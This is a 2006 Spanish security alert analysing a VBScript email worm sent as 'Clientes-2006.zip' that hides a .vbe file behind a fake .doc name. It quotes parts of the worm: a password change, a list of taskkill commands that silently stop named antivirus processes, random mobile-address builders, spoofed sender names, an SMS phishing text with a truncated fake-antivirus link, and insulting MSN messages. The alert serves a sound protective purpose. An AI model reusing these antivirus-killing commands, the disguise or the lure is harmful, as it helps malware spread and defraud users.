Virus y Troyanos

La Comisión de Seguridad de la Asociación de Internautas ha detectado en las ultimas horas un nuevo gusano que puede afectar a clientes de Movistar, Vodafone y Ono, el gusano esta realizado en Visual Basic Script.

Se puede reconocer fácilmente por el asunto del mensaje y su adjunto: Listado Impagados Clientes 2006

Fichero adjunto: Clientes-2006.zip


El gusano puede confundir a muchos usuarios ya que visualmente parece un fichero DOC, en realidad el fichero se llama “Clientes2006.doc (ESPACIOS) Microsoft Word Document (ESPACIOS) .vbe

Efecto del engaño:


Fichero real:

25-08-2006 - El método de infección llega por medio de la recepción de un correo electrónico, los posibles remitentes son los clientes de Movistar, Vodafone y Ono.



En el simula ser un envió de listados de clientes de impagados del 2006, el correo contiene un fichero adjunto llamado Clientes-2006.zip , si una victima abre el fichero se puede creer que es un fichero de texto DOC, cuando en realidad es un VBE (Visual Basic Script).

Lo primero que hace el gusano es cambiar la contraseña del usuario:
Const newpassword= "Leslie"

A continuación nos intenta cerrar los procesos de un listado de antivirus conocidos:

CreateObject("WScript.Shell").run "taskkill /f /im apvxdwin.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im avengine.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im PavPrsrv.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im PavFnSvr.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im Pavsrv51.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im mcagent.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im mcdetect.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im bdnagent.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im bdmcon.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im navapsvc.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im navapw32.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im savscan.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im navw32.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im avpcc.exe", vbhide
CreateObject("WScript.Shell").run "taskkill /f /im avpm.exe", vbhide


En otra parte del código del gusano intenta mandar un mensaje a clientes de Movistar, Vodafone y Ono, con nombre aleatorios de un listado:

Function SMS
Dim Prefijo3
Dim Numero3
Dim Destinatario3
Dim Aleatorio3
Aleatorio3 = 0
NumerO3 = ""
Prefijo3 = "600"
Destinatario3 = "@vodafone.es"
Randomize
Aleatorio3 = Int(8 * Rnd)
If Aleatorio3 = 0 Then
Prefijo3 = "617"
ElseIf Aleatorio3 = 1 then
Prefijo3 = "627"
ElseIf Aleatorio3 = 2 then
Prefijo3 = "634"
ElseIf Aleatorio3 = 3 then
Prefijo3 = "664"
ElseIf Aleatorio3 = 4 then
Prefijo3 = "666"
ElseIf Aleatorio3 = 5 then
Prefijo3 = "697"
ElseIf Aleatorio3 = 6 then
Prefijo3 = "671"
End If
For Contador3 = 1 To 6




Randomize
Aleatorio3 = Int(10 * Rnd)
Numero3 = Numero3 & Aleatorio3
Next
SMS = Prefijo & Numero & Destinatario
End Function
Function SMS2
On Error Resume Next
Dim Prefijo2
Dim Numero2
Dim Destinatario2
Dim Aleatorio2
Aleatorio2 = 0
Numero2 = ""
Prefijo2 = "696"
Destinatario2 = "@movistar.es"
Randomize
Aleatorio2 = Int(8 * Rnd)
If Aleatorio2 = 0 Then
Prefijo2 = "609"
ElseIf Aleatorio2 = 1 then
Prefijo2 = "619"
ElseIf Aleatorio2 = 2 then
Prefijo2 = "629"
ElseIf Aleatorio2 = 3 then
Prefijo2 = "630"
ElseIf Aleatorio2 = 4 then
Prefijo2 = "639"
ElseIf Aleatorio2 = 5 then
Prefijo2 = "646"
ElseIf Aleatorio2 = 6 then
Prefijo2 = "649"
End If
For Contador2 = 1 To 6
Randomize
Aleatorio2 = Int(10 * Rnd)
Numero2 = Numero2 & Aleatorio2
Next
SMS2 = Prefijo2 & Numero2 & Destinatario2
End Function
Function From
On Error Resume Next
Aleatorio5 = 0
Direccion5 = "@ono.com"
Randomize
Aleatorio5 = Int(8 * Rnd)
If Aleatorio5 = "0" Then
Nombre5 = "pedrotoledo"
ElseIf Aleatorio5 = "1" then
Nombre5 = "Jm_Torres"
ElseIf Aleatorio5 = "2" then
Nombre5 = "ramirezmerino"
ElseIf Aleatorio5 = "3" then
Nombre5 = "clubbyte"
ElseIf Aleatorio5 = "4" then
Nombre5 = "raulmed"
ElseIf Aleatorio5 = "5" then
Nombre5 = "ProductionX"
ElseIf Aleatorio5 = "6" then

Nombre5 = "vicenterevenga"
ElseIf Aleatorio5 = "7" then
Nombre5 = "mlgarciaarranz"

El mensaje que envía a móviles es el siguiente:

objEmail.From = From
objEmail.To = SMS
objEmail.CC = SMS2
objEmail.Subject = "Aviso del Operador"
objEmail.Textbody = "Debido a los problemas ocurridos con virus para teléfonos móviles. Rogamos descarguen el antivirus realizado exclusivamente para nuestros clientes. Hagan click en el link adjunto. *Nota: Este Antivirus es válido para los Nokia S60 (3650,6630,6670,6680,6681,7610,7650,N70,N90,N91). Link: http://f1.grp.yahoo.....QUITADO."

También el gusano hace dos cosas mas se envía de forma automática con los siguientes remitentes de ONO:

On Error Resume Next
Aleatorio = 0
Direccion = "@ono.com"
Randomize

Nombre = "jllrives"
Nombre = "ChiLiTa"
Nombre = "antonioboronat"
Nombre = "konsulatRPmurcia"
Nombre = "marinadef"
Nombre = "Fernando.Ramos"
Nombre = "anaballabriga"
Nombre = "rapidisa"
Nombre = "ceutideportes"
Nombre = "p_canter"
Nombre = "acutel"
Nombre = "dni"
Nombre = "peterhall"
Nombre = "tiendasmiro"
Nombre = "asindown"
Nombre = "pedrotoledo"
Nombre = "Jm_Torres"
Nombre = "ramirezmerino"

Nombre = "juher"
Nombre = "raulmed"
Nombre = "aleroic"
Nombre = "vicenterevenga"
Nombre = "mlgarciaarranz"
Nombre = "alerjosemoreno"
Nombre = "cnbenicarlo"
Nombre = "animaciencia"
Nombre = "ullances"
Nombre = "davidconejero"
Nombre = "marcial"
Nombre = "jadela"
Nombre = "izmacian"

End If
For Contador = 1 To 2
Randomize
Nombre = Nombre
Next
Destino = Nombre & Direccion

Por ultimo envía mensajes a los que usen el MSN, ponemos algunos ejemplos, no todos ya que los mensajes están fuera de tono:

'Aleatorio2 = 1
Frase = "Guarro"
Randomize
Otro = Int(30 * Rnd)
If Otro = 0 Then
Frase = "Lok@"
ElseIf Otro = 1 then
Frase = "Ciruel@"
ElseIf Otro = 2 then
Frase = "Cara Carton"
ElseIf Otro = 3 then
Frase = "Cimbrel"
ElseIf Otro = 4 then
Frase = "Monstruo"
ElseIf Otro = 5 then
Frase = "Put@"
ElseIf Otro = 6 then
Frase = "Cerd@"
ElseIf Otro = 7 then
Frase = "Soy Puta"
ElseIf Otro = 8 then
Frase = "Comeme el rabo"
ElseIf Otro = 9 then
Frase = "Mejor comeme la clochinilla"
ElseIf Otro = 10 then
Frase = "Soy Cara de Culo. Pero... tu tambien...."
ElseIf Otro = 11 then
Frase = "Puedo apagarte el ordenador????"
ElseIf Otro = 12 then
Frase = "Cabra loca!!!!!"
ElseIf Otro = 13 then
Frase = "Tienes petas???"
ElseIf Otro = 14 then
Frase = "Estoy enamorad@ de ti...."


Queremos recordar que este articulo es un análisis rápido del gusano detectado en las ultimas horas para ayudar al usuario a conocer el peligro que puede llegar a tener este nuevo gusano, no se intenta profundizar mas sobre el código ya que lo importante es poder parar la propagación del nuevo gusano y alertar del peligro del mismo.

Recuerde no ejecuten nunca ficheros de correos de desconocidos, si el remitente es conocido y no esperaba el correo TAMPOCO LO EJECUTE siempre verifiquen el fichero con un antivirus actualizado, es mejor ser cauto y no poner en peligro la seguridad de nuestro sistema.